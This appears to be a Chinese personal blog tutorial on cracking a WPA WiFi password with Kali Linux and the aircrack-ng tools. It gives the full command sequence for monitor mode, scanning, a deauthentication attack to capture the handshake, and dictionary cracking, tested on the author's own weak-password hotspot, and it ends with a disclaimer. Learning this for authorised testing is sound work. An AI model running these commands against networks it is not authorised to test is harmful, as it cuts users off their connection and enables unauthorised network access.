前言

以前刚听说kali linux时就对渗透测试方面比较感兴趣,时隔几年再次拿起曾经的无线网卡(带监听功能),再次对局域网的wifi进行了一下渗透测试,遂简单记录一下,方便以后查阅使用

操作流程

假设已经安装了kali linux虚拟机,本文使用的是vmware,并购买了具有监听功能的无线网卡

1.查看网卡是否正确插入

iwconfig

2023-10-15T11:37:31.png

2.启动网卡监听

airmon-ng start wlan0

3.扫描信号

airodump-ng wlan0mon

2023-10-15T11:52:20.png

4.监听指定目标

airodump-ng wlan0mon -c 13 --bssid  76:0C:38:99:53:75 -w ~/handshake
-c后跟信道,即CH那列

5.解除认证攻击

新开一个窗口

aireplay-ng wlan0mon -0 1 -a 9A:09:E8:87:46:39 -c E0:DC:FF:D2:FF:C1
-0表示解除认证模式,俗称断网打击,后面跟发送数据包次数,设为0表示不限,除非按下Ctrl-c,不然目标会一直没有网络连接,-a后跟ap的MAC地址,-c跟目标地址,即上一个窗口扫描中出现的STATION一列。

当上一个扫描窗口中日期后面出现WPA handshake时表示抓到了握手包,如果还没有,可再次执行断网打击。

2023-10-15T12:21:19.png

6.字典暴力破解

aircrack-ng -w pwd.txt *.cap

2023-10-15T13:11:27.png

三丰这里测试了几次,热点使用随机MAC,所以这里选择第2个有握手包的地址,然后能不能破解就看字典了,这里三丰直接把弱密码250250250写进了字典里,最后破解成功示例如下图

2023-10-15T13:11:52.png

本文仅作学习交流,请勿随意对你所在局域网进行扫描攻击!!!

遇到的问题

虚拟机无法联网,读取不了网卡,可以cmd中输入 services.msc 检查一下是否是vmware的相关服务未开启

2023-10-15T13:12:00.png

参考链接

最后修改:2023 年 10 月 15 日
如果觉得我的文章对你有用,请随意赞赏